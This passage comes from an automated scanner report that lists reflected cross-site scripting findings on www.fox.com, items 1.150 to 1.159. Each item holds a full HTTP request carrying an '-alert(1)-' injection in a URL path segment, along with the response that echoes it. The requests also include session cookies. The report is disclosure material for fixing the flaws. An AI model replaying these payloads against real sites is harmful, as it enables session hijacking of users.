Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21757
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
s" //Site Section
s_analytics.prop7="fox:shows:_ugc" //Site Sub - Section
s_analytics.prop8="fox:shows:_ugc:xm" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ugc:xmlhomepage_ep_2011-10-4.xml1a6d4"-alert(1)-"dd4b1ac882d"
s_analytics.prop15="sub section:homepage_ep_2011-10-4" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

1.150. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df44"-alert(1)-"519baa039a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui8df44"-alert(1)-"519baa039a9/fox_player/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 21904
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui8df44"-alert(1)-"519baa039a9:fox_playerfoxanalyticsextension"
s_analytics.hier1="fox:shows:_ui8df44"-alert(1)-"519baa039a9:fox_playerfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_
...[SNIP]...

1.151. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9233"-alert(1)-"c89ee70262d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playera9233"-alert(1)-"c89ee70262d/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21876
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playera9233"-alert(1)-"c89ee70262dfoxanalyticsextension"
s_analytics.hier1="fox:shows:_ui:fox_playera9233"-alert(1)-"c89ee70262dfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_play
...[SNIP]...

1.152. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896b7"-alert(1)-"3ed23f0e348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf896b7"-alert(1)-"3ed23f0e348/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 21764
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf896b7"-alert(1)-"3ed23f0e348"
s_analytics.prop15="sub section:foxanalyticsextension" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

1.153. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4335e"-alert(1)-"0accea0a5eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui4335e"-alert(1)-"0accea0a5eb/fox_player/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 21880
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui4335e"-alert(1)-"0accea0a5eb:fox_playerfoxlayoutplugin"
s_analytics.hier1="fox:shows:_ui4335e"-alert(1)-"0accea0a5eb:fox_playerfoxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui4335e"-ale
...[SNIP]...

1.154. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e53"-alert(1)-"a2469b6ef49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player91e53"-alert(1)-"a2469b6ef49/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 21852
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player91e53"-alert(1)-"a2469b6ef49foxlayoutplugin"
s_analytics.hier1="fox:shows:_ui:fox_player91e53"-alert(1)-"a2469b6ef49foxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player91e53"-ale
...[SNIP]...

1.155. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f3fa"-alert(1)-"6314bb53e69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf4f3fa"-alert(1)-"6314bb53e69/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21740
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf4f3fa"-alert(1)-"6314bb53e69"
s_analytics.prop15="sub section:foxlayoutplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analyti
...[SNIP]...

1.156. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c64f"-alert(1)-"60e8ceb9474 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui3c64f"-alert(1)-"60e8ceb9474/fox_player/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21892
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui3c64f"-alert(1)-"60e8ceb9474:fox_playerfoxomnituremonitor"
s_analytics.hier1="fox:shows:_ui3c64f"-alert(1)-"60e8ceb9474:fox_playerfoxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui3c64
...[SNIP]...

1.157. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b7d"-alert(1)-"495dd8f1e73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player29b7d"-alert(1)-"495dd8f1e73/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21864
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player29b7d"-alert(1)-"495dd8f1e73foxomnituremonitor"
s_analytics.hier1="fox:shows:_ui:fox_player29b7d"-alert(1)-"495dd8f1e73foxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player29b7
...[SNIP]...

1.158. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56b6e"-alert(1)-"81daa3b06d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf56b6e"-alert(1)-"81daa3b06d4/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 21752
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf56b6e"-alert(1)-"81daa3b06d4"
s_analytics.prop15="sub section:foxomnituremonitor" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_anal
...[SNIP]...

1.159. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f141d"-alert(1)-"e64e46fa8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

